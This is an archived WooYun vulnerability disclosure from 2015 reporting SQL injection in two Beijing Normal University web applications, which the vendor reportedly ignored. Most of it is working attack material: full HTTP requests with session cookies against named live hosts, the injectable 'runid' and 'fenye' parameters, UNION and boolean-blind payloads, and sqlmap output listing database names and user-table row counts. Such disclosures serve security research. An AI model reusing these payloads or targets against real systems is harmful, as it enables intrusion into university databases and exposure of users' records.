乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-24: 细节已通知厂商并且等待厂商处理中 2015-11-29: 厂商已经主动忽略漏洞,细节向公众公开
RT
GET /contest/show_ce_info.php?runid= HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://acm.bnu.edu.cnCookie: bnuoj_v3_style=journal; cstandset_null_7274=shownum%3D0%26autoref%3Don%26anim%3Don%26cid%3D7274; defaultshare=1; mjx.menu=; bnuoj_v3_defaultshare=1Host: acm.bnu.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
runid参数存在注入
sqlmap resumed the following injection point(s) from stored session:---Parameter: runid (GET) Type: UNION query Title: Generic UNION query (random number) - 1 column Payload: runid=-8371 UNION ALL SELECT CONCAT(0x716b767071,0x6d78735241484c55596967754b6f58706a6175774868664644707a776e6454444672414d65636269,0x716a6a7671)-- ----web application technology: PHP 5.6.7back-end DBMS: active fingerprint: MySQL >= 5.5.0 banner parsing fingerprint: MySQL 5.5.36, logging enabledbanner: '5.5.36-MariaDB-1~squeeze-log'available databases [4]:[*] bnuoj[*] bnuojoi[*] graduate[*] information_schema
Database: graduate+----------+---------+| Table | Entries |+----------+---------+| `user` | 51 || ranklist | 51 || problem | 9 || status | 1 |+----------+---------+
Database: bnuojoi+----------+---------+| Table | Entries |+----------+---------+| status | 5800 || `user` | 334 || ranklist | 334 || problem | 138 || mail | 23 |
GET /achievements.jsp?fenye=*&www=1 HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://ireg.bnu.edu.cnCookie: JSESSIONID=A958431F27BD1F7AF4A00031374E1722; imgnum=0Host: ireg.bnu.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
fenye参数存在注入
qlmap resumed the following injection point(s) from stored session:---Parameter: #1* (URI) Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - Parameter replace Payload: http://ireg.bnu.edu.cn:80/achievements.jsp?fenye=(SELECT (CASE WHEN (7284=7284) THEN 7284 ELSE 7284*(SELECT 7284 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&www=1---web application technology: JSPback-end DBMS: MySQL 5available databases [5]:[*] bierf[*] bierfcist[*] iiki2013reg[*] information_schema[*] test
危害等级:无影响厂商忽略
忽略时间:2015-11-29 12:28
漏洞Rank:4 (WooYun评价)
暂无